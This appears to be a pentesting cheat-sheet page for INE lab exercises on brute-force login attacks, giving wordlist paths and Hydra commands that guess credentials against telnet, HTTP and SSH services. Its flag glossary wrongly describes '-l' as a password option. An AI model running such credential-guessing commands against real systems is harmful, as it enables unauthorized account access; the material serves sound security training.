πŸ”²Bruteforce Attacks

Bruteforce Wordlists Suggested in INE LABS

USERNAME LIST 1: /usr/share/ncrack/minimal.usr

PASSWORD LIST 1: /usr/share/seclists/Passwords/rockyou-10.txtPASSWORD LIST 2: /usr/share/seclists/Passwords/rockyou-15.txt

Hydra

Attacking telnet service

hydra -L user_list.txt -P password_list.txt telnet://target.server

Attacking http-get service

hydra -L user_list.txt -P password_list.txt http-get://target.server

Attacking ssh service

hydra -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-15.txt ssh://192.168.99.22:22

-l ==> Password string to use
-L ==> Define List of usernames stored in a File
-p ==> Password string to use
-P ==> Define List of passwords stored in a File
telnet:// ==> used for telnet connection
http-get:// ==> used for http-get requests

Bruteforce Scripts

Basic Bruteforce Algorithm

Last updated

Was this helpful?